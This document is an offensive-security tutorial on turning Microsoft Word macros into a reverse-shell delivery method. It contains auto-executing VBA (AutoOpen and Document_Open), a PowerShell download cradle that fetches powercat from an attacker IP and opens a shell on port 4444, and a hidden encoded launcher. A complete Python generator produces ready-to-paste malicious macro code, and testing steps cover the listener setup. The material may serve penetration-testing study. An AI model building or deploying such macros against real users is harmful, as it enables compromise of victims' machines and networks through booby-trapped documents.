Exploiting Microsoft Office

Leveraging Microsoft Word Macros for Reverse Shells

Overview

Microsoft Word macros, written in Visual Basic for Applications (VBA), can automate tasks and serve as a powerful client-side attack vector when maliciously crafted. This guide outlines the creation of a macro to launch a reverse shell using PowerShell.


Key Points

1. Macro Basics

  • What are Macros?

    • Macros are written in VBA, offering full access to ActiveX objects and the Windows Script Host.

    • Macros can only be stored in the legacy .doc format or in the macro-enabled .docm format. The default .docx format cannot contain macros at all: saving a document that holds a VBA project as .docx discards the project (Word warns that it cannot be saved in a macro-free document).


2. Macro Setup

Steps:

  1. Create a Word document and save it in the legacy .doc (Word 97-2003) format, since .docx cannot hold macros.

  2. Open View > Macros, give the macro a name (MyMacro in the examples below), and click Create.

  3. The Visual Basic for Applications editor opens on an empty Sub with that name; write the macro there.

Default Macro Skeleton:

Sub MyMacro()
'
' MyMacro Macro
'
End Sub

3. Executing Commands with ActiveX

Example Macro to Open PowerShell:

Sub MyMacro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

4. Auto-Execution

Word runs a procedure named AutoOpen from a standard module when the document is opened, and Document_Open is the equivalent event procedure of the ThisDocument module. Defining both, each calling MyMacro, covers either placement. Neither fires until the user leaves Protected View and clicks Enable Content:

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

5. Creating a Reverse Shell

PowerShell Download Cradle:

IEX(New-Object System.Net.WebClient).DownloadString('http://<IP>/powercat.ps1');powercat -c <IP> -p 4444 -e powershell
  • Base64-encode the command so that its quotes and other special characters need no escaping inside the VBA string. PowerShell's -EncodedCommand (-enc) expects the base64 of the command's UTF-16LE bytes, not its UTF-8 bytes; encoding UTF-8 produces a string PowerShell decodes to garbage and fails to run.


6. Embedding Encoded Commands

VBA rejects a single string literal longer than 255 characters, and the encoded launcher is far longer than that, so split it into short chunks and concatenate them at run time:

Sub MyMacro()
    ' Assemble the launcher from short literals; VBA caps one literal at 255 chars.
    Dim Str As String
    Str = Str & "powershell.exe -nop -w hidden -enc BASE64_ENCODED_COMMAND_PART1"
    Str = Str & "BASE64_ENCODED_COMMAND_PART2"
    ' ... one further line per remaining chunk of the encoded command ...
    ' -nop skips the profile, -w hidden hides the console, -enc takes the base64 command.
    CreateObject("Wscript.Shell").Run Str
End Sub
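The encoding and chunking described in sections 5 and 6 are error-prone by hand, so the following is an added Python generator (not code from the original page): it encodes the download cradle the way powershell.exe -enc expects (UTF-16LE, then base64), splits the launcher into 50-character literals, emits the AutoOpen / Document_Open / MyMacro skeleton shown above, and finally reassembles and decodes the generated macro to confirm it carries exactly the intended command. The attacker address 192.168.45.200, port 4444 and the 50-character chunk size are assumptions for the example, and reassemble and recover_command are helper names introduced here, not VBA or PowerShell features.

```python
"""Build a chunked VBA macro around a base64-encoded PowerShell launcher.

Added example: encodes the command as powershell.exe -EncodedCommand expects
(UTF-16LE, then base64), splits the result into short VBA string literals and
emits the AutoOpen / Document_Open / MyMacro skeleton from the page.
"""
import base64

# Constructed lab values (assumptions); substitute your own listener address and port.
ATTACKER_IP = "192.168.45.200"
LISTEN_PORT = 4444

# The download cradle from the page, with the placeholders filled in.
PS_COMMAND = (
    f"IEX(New-Object System.Net.WebClient).DownloadString('http://{ATTACKER_IP}/powercat.ps1');"
    f"powercat -c {ATTACKER_IP} -p {LISTEN_PORT} -e powershell"
)

LAUNCHER_PREFIX = "powershell.exe -nop -w hidden -enc "


def encode_for_powershell(command: str) -> str:
    """-EncodedCommand decodes base64 into UTF-16LE text, so UTF-8 input would be garbled."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_from_powershell(encoded: str) -> str:
    """Inverse of encode_for_powershell, used to verify the payload before embedding it."""
    return base64.b64decode(encoded).decode("utf-16-le")


def split_chunks(text: str, size: int) -> list[str]:
    """Fixed-width slices; the last one may be shorter."""
    return [text[i:i + size] for i in range(0, len(text), size)]


def build_macro(command: str, chunk_size: int = 50) -> str:
    """Emit VBA that rebuilds the launcher from literals of at most chunk_size characters.

    50 (an assumption here) leaves a wide margin under VBA's 255-character literal limit.
    """
    launcher = LAUNCHER_PREFIX + encode_for_powershell(command)
    # Base64 output never contains a double quote and neither does the fixed prefix,
    # so the chunks drop into VBA literals without any escaping.
    if '"' in launcher:
        raise ValueError("launcher contains a double quote; a VBA literal would break")
    lines = [
        "Sub AutoOpen()", "    MyMacro", "End Sub", "",
        "Sub Document_Open()", "    MyMacro", "End Sub", "",
        "Sub MyMacro()",
        "    Dim Str As String",
    ]
    lines += [f'    Str = Str & "{part}"' for part in split_chunks(launcher, chunk_size)]
    lines += ['    CreateObject("Wscript.Shell").Run Str', "End Sub"]
    return "\n".join(lines)


def reassemble(macro: str) -> str:
    """Do what the VBA interpreter will do: concatenate the literals back into one command."""
    parts = []
    for line in macro.splitlines():
        stripped = line.strip()
        if stripped.startswith('Str = Str & "') and stripped.endswith('"'):
            parts.append(stripped[len('Str = Str & "'):-1])
    return "".join(parts)


def recover_command(macro: str) -> str:
    """Pull the -enc argument out of the reassembled launcher and decode it."""
    launcher = reassemble(macro)
    encoded = launcher.split(" -enc ", 1)[1]
    return decode_from_powershell(encoded)


if __name__ == "__main__":
    vba = build_macro(PS_COMMAND)
    print(vba)
    # Round-trip check: the macro must carry exactly the command we started from.
    assert recover_command(vba) == PS_COMMAND
```

Paste the printed VBA into the macro editor in place of the skeleton. The round-trip check is worth keeping in any such generator: the most common hand-encoding mistake is base64 of the UTF-8 bytes rather than UTF-16LE, which PowerShell decodes to nonsense and quietly fails on, leaving a listener that never receives a connection.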

7. Testing

  1. On the attacker machine, serve powercat.ps1 over HTTP at the address used in the cradle (Python's built-in http.server module is sufficient for a lab).

  2. Start a Netcat listener on the port passed to powercat (4444 in the example above).

  3. On the target, open the Word document, leave Protected View and click Enable Content; the cradle downloads powercat and the shell arrives at the listener.


Summary

  • Objective: Exploit Word macros for initial footholds in enterprise networks.

  • Outcome: A reverse shell is achieved using a malicious macro that downloads and executes PowerCat via PowerShell.

  • Challenges:

    • Victim must enable macros.

    • Increased awareness and security controls make delivery harder.

Macros remain effective but increasingly challenging to deliver, necessitating alternative or supplementary attack vectors.
